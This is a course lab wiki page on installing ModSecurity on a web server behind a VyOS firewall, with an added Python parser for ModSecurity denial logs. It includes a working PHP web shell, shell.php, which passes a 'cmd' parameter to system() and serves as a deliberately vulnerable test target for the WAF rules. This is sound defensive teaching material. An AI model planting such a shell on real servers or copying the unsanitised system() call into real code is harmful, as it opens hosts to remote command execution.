Lab 5.1 Wazuh WAF - Cyber-JL/SEC-350-01 GitHub Wiki
- We need to add a new permanent rule to vyos such that established connections from the DMZ-to-WAN are allowed back through the WAN-to-DMZ firewall. If that rule (typically rule 1) is not there, add it.

  ```
  configure
  set firewall name WAN-to-DMZ rule 1 action accept
  set firewall name WAN-to-DMZ rule 1 state established enable
  commit
  save
  ```
- We need to add a temporary rule for software updates that we either delete, disable or discard when complete. This rule should have the following characteristics:
  - Set the rule number to 999 or similar
  - Set the action to accept (this is wide open)
  - Set the source IP address to be the web server

  ```
  configure
  set firewall name DMZ-to-WAN rule 999 action accept
  set firewall name DMZ-to-WAN rule 999 source address 172.16.50.3
  commit
  save
  ```
- On web01 run the following:

  ```
  sudo yum install mod_security mod_security_crs php php-common php-opcache php-cli php-gd php-curl php-mysqlnd -y
  sudo systemctl restart httpd
  ```
- To show that the security2_module is loaded, run the following:

  ```
  sudo httpd -M | grep security2
  sudo cat /var/log/httpd/error_log | grep ModSecurity
  ```
- Once the installation has worked, make sure to delete, disable or discard rule 999. Make sure to commit so that we are locked down once again.
- On fw01 run (the delete must be issued from configuration mode, so enter it first):

  ```
  configure
  delete firewall name DMZ-to-WAN rule 999
  commit
  save
  ```
- On web01, in /var/www/html/ create a file called shell.php and add the following to the file:

  ```php
  <!-- Deliberately vulnerable test page used in this lab to trigger the ModSecurity (CRS) rules -->
  <html>
  <body>
  <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
  <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
  <input type="SUBMIT" value="Execute">
  </form>
  <pre>
  <?php
  if (isset($_GET['cmd'])) {
      system($_GET['cmd']);
  }
  ?>
  </pre>
  </body>
  </html>
  ```
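
Once security2_module is loaded, the error_log lines that `grep ModSecurity` returns are what Wazuh will be collecting from web01, and requests to the shell.php test page are what should show up there as denials. The following Python is an added example, not part of the lab page: it parses those lines into fields (client, CRS rule id, URI, whether the request was denied) and summarises denials per client and per rule; the sample log lines, rule ids and addresses in it are constructed for illustration.

```python
import re
from collections import Counter
# Constructed sample of /var/log/httpd/error_log on web01 (not taken from the
# lab): one ModSecurity denial, one ModSecurity warning, one ordinary httpd line.
SAMPLE_ERROR_LOG = (
    '[Tue Mar 05 10:12:01.123456 2024] [:error] [pid 2201] [client 10.0.17.5:51234] '
    'ModSecurity: Access denied with code 403 (phase 2). Matched phrase "ls" at ARGS:cmd. '
    '[id "932100"] [msg "Remote Command Execution: Unix Command Injection"] '
    '[severity "CRITICAL"] [hostname "web01"] [uri "/shell.php"] [unique_id "Zeb0AQ"]\n'
    '[Tue Mar 05 10:12:05.654321 2024] [:error] [pid 2201] [client 10.0.17.5:51240] '
    'ModSecurity: Warning. Operator GE matched 5 at TX:anomaly_score. [id "949110"] '
    '[msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] '
    '[hostname "web01"] [uri "/index.html"] [unique_id "Zeb0BQ"]\n'
    "[Tue Mar 05 10:13:00.000000 2024] [core:notice] [pid 2200] AH00094: Command line: "
    "'/usr/sbin/httpd -D FOREGROUND'\n"
)

# [client IP:port] prefix (IPv4 form), quoted [key "value"] tags, and the denial marker.
CLIENT_RE = re.compile(r"\[client (?P<ip>[^\]:]+)(?::\d+)?\]")
TAG_RE = re.compile(r'\[(?P<key>[a-z_]+) "(?P<val>[^"]*)"\]')
DENIED_RE = re.compile(r"ModSecurity: Access denied with code (?P<code>\d+)")

def parse_modsec_events(log_text):
    """One dict per ModSecurity line; other httpd lines are skipped."""
    events = []
    for line in log_text.splitlines():
        if "ModSecurity:" not in line:
            continue
        tags = {m.group("key"): m.group("val") for m in TAG_RE.finditer(line)}
        client = CLIENT_RE.search(line)
        denied = DENIED_RE.search(line)
        events.append({
            "client": client.group("ip") if client else None,
            "rule_id": tags.get("id"),
            "msg": tags.get("msg"),
            "uri": tags.get("uri"),
            "denied": denied is not None,
            "status": int(denied.group("code")) if denied else None,
        })
    return events

def summarize(events):
    """Counts worth alerting on in Wazuh: denials per client and per CRS rule id."""
    denied = [e for e in events if e["denied"]]
    return {
        "seen": len(events),
        "denied": len(denied),
        "by_client": Counter(e["client"] for e in denied),
        "by_rule": Counter(e["rule_id"] for e in denied),
    }
```

Run it against the real file with `parse_modsec_events(open("/var/log/httpd/error_log").read())` to confirm that a request to shell.php was actually denied rather than only logged as a warning.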